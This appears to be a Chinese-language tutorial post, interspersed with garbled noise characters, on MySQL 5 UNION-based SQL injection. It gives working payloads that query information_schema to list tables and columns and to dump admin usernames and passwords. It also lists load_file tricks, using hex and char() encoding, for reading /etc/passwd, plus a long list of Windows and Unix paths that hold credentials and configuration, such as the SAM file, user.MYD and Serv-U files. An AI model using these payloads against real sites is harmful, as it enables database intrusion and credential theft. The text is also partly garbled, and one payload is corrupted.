mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


  C& f# H8 p8 m* a+ R8 y
8 |. P/ a1 A5 Z: X8 uMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
0 C7 W. w8 `$ V9 J, g明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
0 _0 d- g* r! b1 w. z  T|—字段：SCHEMA_NAME ->数据库名称
# f8 m: k7 c* {
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
4 q  P8 U& `, }& \( a: M/ S
|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
& k% S( n* h& e( D. e+ v4 }; g6 C4 h
#########################################################################
##
; ?/ V/ x" H) V) M
0×001 获取系统信息:
" I1 v! S# l" Q* l
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
, S7 d' z% x. `6 n* c; B
/*

/ M# n! H: y) X' m@@global.version_compile_os 获取系统版本
% t  X+ u' g) I1 a5 J$ ?4 v6 p# }
3 @" a% Q5 K0 d/ |$ Q- p@@datadir 数据库路径
7 R! c' {( ^6 y% @) ~; a6 t3 xdatabase() 当前数据库名称
8 W" U# [4 V6 C; [* O) z0x3c62723e 换行HEX值
% G# j& e2 H' `7 _2 _2 K& R* P! o- @8 Y+ C
+ U1 L$ e8 B1 r8 y6 _*/
9 m  C5 S9 t+ Z1 J
######################################################################
6 x* h# }1 d7 I0 J9 g' L  L
0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
! \6 _7 j+ {2 m+ }$ X' n' w# s# i2 z! {
/*

( z2 X1 f" Q7 N" [! \0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

) H+ _- W4 _, K9 E+ Z; O*/
! D' Y& c' ?) a6 N" i) X+ F
) S* A; I' V: n) n######################################################################

0×003 获取字段
! q) O: v% ~' v4 W
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and

# q0 Q' o+ \. `7 q3 C
6 Y) d( Z% T  h* q2 d# f; Q+ Qtable_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
; v; a8 v9 r0 }1 _) m
' }. r0 E! y: i. M& |0x61646d696e ->选择一个表
8 Z2 M. i7 |  Q  L9 N1 _
6 l; Z' V/ H% f% s! q" o* F3 Z0x67617264656e ->数据库名
' O* w& m( t  c
# d" I, u3 l) E# f% C9 Z  ?4 W*/

#####################################################################
( W8 ]( ~' G3 [8 `+ m7 A5 q
0×004 获取数据

* V) C' C/ x. D$ k% {4 eunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
8 Q- j' S/ j+ m& M- V6 m3 ?7 ~- Q$ o
6 J* w0 d* k: J0 a4 C5 K$ P+ ounion select 1,group_concat(id),group_concat(adname),4,5,group_concat
/ M" x" {- E( \4 N! s0 J% o(adpassword),6,7,8 from admin

& `3 T$ @2 a  o: Z  ^/*
! ~& n: ]! |- C8 m5 q0 k$ N8 b
0x3c62723e 换行符号HEX编码
4 B) a' X0 R8 i; m: o; I
8 V* C" \+ T8 {' X; k' Igroup_concat 同时获得该字段所有数据

% v2 V1 i* m& V) N, [% X* U*/

0 N& \6 E! M6 c; L$ w

" l# `: x0 q0 ?7 }- I9 q

顺便添加一些mysql注入时非常有用的一些东西

' ~3 j. q( |# `: N3 l2 e; y简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

% C6 o$ }- M" Y1:system_user() 系统用户名
2:user()        用户名
- b9 U- B6 h' ~; V3:current_user()  当前用户名
4:session_user()连接数据库的用户名
8 o5 O$ o2 ]% N+ s" a6 T1 X5:database()    数据库名
6:version()     MYSQL数据库版本
) V) y0 {9 K/ i+ |! Y" J7:load_file()   MYSQL读取本地文件的函数
5 l5 l( Y+ `/ k; t% _( P8@datadir     读取数据库路径
: t! j* Q- _+ @- i9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
0 [+ Y$ `6 e/ |c:/boot.ini          //查看系统版本
5 f# N$ F  Z4 rc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
: L/ G/ `) ~+ G4 w6 Dc:/winnt/php.ini
6 m! O2 _( r- b8 J6 {' m) gc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
5 W0 R7 j* [( n( Pc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
0 }9 J- y$ t1 X4 [; \5 ]c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
- Y; K/ I, o* S- S! W9 H" L2 J" S  \c:\Program Files\RhinoSoft.com\ServUDaemon.exe
: a3 D  r) [4 }6 V  q! uC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
7 A( G; V# O! C3 x( r//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
7 I# b( I2 x; d! Z! t8 i9 U9 ac:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


' B& b/ ?$ b$ d/ Y" `! E5 Nc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
1 M+ W/ }; x2 Y5 C8 _, rd:\APACHE\Apache2\conf\httpd.conf
/ Y( O( D6 o4 \& V# ~' v; c6 FC:\Program Files\mysql\my.ini
' p$ a" g" g! H! }+ q9 D3 ?* t$ nc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
; K# L; v: _: n. y
1 f7 a. j9 d  A( h, t  GLUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
5 a1 d, p) p6 S& R9 U; P/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
, b) E5 j% R0 k* ]* ~0 V% c$ |; I9 B/etc/my.cnf //mysql的配置文件
! ]* K0 H+ n+ N+ z- ^/etc/redhat-release //系统版本
" {: i8 A2 K  e/etc/issue
8 S" s( v: b" j1 w% y3 R/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
5 t3 ?) r6 f6 p, |5 g/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
* J; f$ v. z; M1 S/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
5 q1 d  s) s) n8 P( I/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
, c% O! u+ B6 W: ?3 a& H. \/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
) U% A+ ~6 H) G/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
$ [2 k& i& w. `. y* Z( m- e  [replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
# g3 W! F. M1 \上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
" R1 ]/ B# r2 g- t